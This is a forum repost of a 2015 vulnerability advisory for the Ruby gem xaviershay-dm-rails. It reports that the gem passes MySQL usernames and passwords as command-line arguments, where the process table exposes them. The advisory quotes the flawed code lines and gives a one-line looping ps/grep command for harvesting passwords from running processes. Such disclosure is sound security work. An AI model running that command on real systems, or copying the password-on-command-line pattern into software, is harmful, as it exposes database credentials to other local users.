Jump to content
Sign in to follow this  

xaviershay-dm-rails MySQL Credential Disclosure

Recommended Posts

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
The problem is with the execute function exposing the user credentials to the process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

def execute(statement)
(username.blank? ? '' : "--user=#{username}"),
(password.blank? ? '' : "--password=#{password}"),

Exploit Code:
• $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115


Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...